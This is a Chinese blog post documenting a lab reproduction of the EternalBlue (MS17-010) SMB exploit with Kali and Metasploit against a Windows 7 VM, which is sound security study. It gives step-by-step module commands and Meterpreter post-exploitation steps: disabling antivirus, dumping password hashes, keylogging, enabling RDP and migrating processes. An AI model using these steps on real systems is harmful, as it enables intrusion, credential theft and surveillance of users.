永恒之蓝漏洞复现

漏洞简介:

永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

漏洞原理:

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。

(详细请看大佬的文章【漏洞分析】MS17-010:深入分析“永恒之蓝”漏洞_If you can take it, you can make it.-CSDN博客_ms17-010漏洞

复现过程:

(1)环境搭建:windows7(Windows Vista、Win8、Win XP、Windows server 2003等也可,镜像可以到系统之家那里下载系统镜像iso下载_系统之家iso镜像下载http://www.xitongiso.com/

(2)复现过程:

打开kali和win7;用nmap扫描同一子网的的靶机,发现目标靶机并且有靶机打开了我们需要利用的445端口

 启动metaspoit

 搜索ms17-010模块:search ms17-010

 从搜素结果可以看出有辅助模块(auxiliary)和攻击模块(exploit)可供选择,先试试辅助模块

用use+模块编号选用模块,设立目标靶机ip:set rhost +ip;执行:run发现目标靶机是易受到ms17-010漏洞攻击的 ,转用攻击模块进行攻击

set lhost +ip设立攻击端

set lport +port 设立监听端口

 

到这里漏洞已经算是复现成功了,接下来是利用漏洞获取更多的靶机信息并进一步扩大施展空间

比如:

screenshot:靶机屏幕截屏并保存到root中

sysinfo:获取靶机系统信息

idletime:靶机开机时间

getuid:查看靶机用户名及其权限(因为主要是为了复现漏洞,所以设置虚拟机时我的window7是能从简就从简的,也就没有设置系统用户名及密码,更没有安装啥杀毒软件)

run post/windows/manage/enable_rdp:打开远程桌面服务

run post/windows/manage/killav:关闭杀毒软件

 run hashdump:查看系统账户密码的hash值

keyscan_start 开启记录目标主机的键盘输入
keyscan_dump 输出截获到的目标键盘输入字符信息
keyscan_stop 停止键盘记录

shell:获取shell

 一下子就成功了,但这个获取的shell很快就died了,网上寻找寻找解决办法,了解到一个进程转换延长shell寿命的方法

相关命令:

ps:查看靶机正在运行的进程

 getpid:查看meterpreter shell的进程号

migrate +稳定进程号:转移进程

 也可以直接用run post/windows/manage/migrate进行自动寻找稳定进程转换。

总结:

漏洞复现总的来说很简单,毕竟是站在巨人的肩膀上,kali上的工具已经为复现做足了准备,主要收获还是meterpreter模块之后的渗透攻击学习,了解了一些以前没见过的命令,算是加深了对kali的使用吧

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之漏洞流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,使用`search ms17_010`命令搜索永恒之漏洞的相关代码。你会找到两个工具,其中`auxiliary/scanner/smb/smb_ms17_010`是用于扫描漏洞的模块,`exploit/windows/smb/ms17_010_eternalblue`是用于攻击的代码。一般情况下,你需要先使用扫描模块,如果显示存在漏洞,再使用攻击代码进行攻击。 4. 配置攻击目标IP,使用命令`use exploit/windows/smb/ms17_010_eternalblue`选择攻击模块。 5. 接下来,你需要使用该模块对靶机服务器进行攻击。使用命令`set RHOSTS <靶机IP>`来配置目标IP。 6. 最后,执行攻击命令,例如使用`exploit`命令开始攻击。 需要注意的是,永恒之漏洞属于安全研究领域,只应在合法的环境下进行,并遵守相关法律法规。在实际环境中,应该始终保持系统和软件的更新,以免存在已知漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之漏洞](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值